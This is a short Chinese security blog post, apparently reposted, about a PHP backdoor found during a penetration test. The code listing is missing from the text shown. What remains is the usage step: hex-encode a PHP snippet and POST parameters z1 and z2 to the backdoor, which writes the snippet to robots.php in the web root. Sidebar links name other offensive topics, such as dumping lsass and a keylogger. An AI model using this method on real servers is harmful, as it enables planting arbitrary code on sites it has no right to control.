分享一款遇到的PHP后门

admin

102737
文章

87
评论

2024年4月4日09:46:04评论2 views字数 286阅读0分57秒阅读模式

这个后门是我在渗透某站时遇到的

代码

代码分析

利用方式

先把要写入的内容URL编码,比如:

编码后：
%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%20%3F%3E
然后去掉里面的百分号(%)得到：
3C3F70687020706870696E666F28293B203F3E
然后给我们的后门POST内容：
z1=/robots.php&z2=3C3F70687020706870696E666F28293B203F3E

可以看到我们的phpinfo已经写入到根目录下的robots.php:

分享一款遇到的PHP后门

- source:www.hackersb.cn

左青龙
微信扫一扫

右白虎
微信扫一扫

robots
PHP后门

本文由 admin 发表于 2024年4月4日09:46:04
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
分享一款遇到的PHP后门http://cn-sec.com/archives/2629522.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

分享一款遇到的PHP后门

代码

代码分析

利用方式

php Thread实例

获取wdigest明文密码加密传输至远程服务器

dump lsass进程

CVE-2020-0688 powershell版

CVE-2020-0601 伪造签名笔记

从零开始学windows API

查看注册表键值修改时间

c++ 修改注册表键值

keylogger

使用 R820T2 电视棒收听 FM 广播

发表评论

在线咨询

微信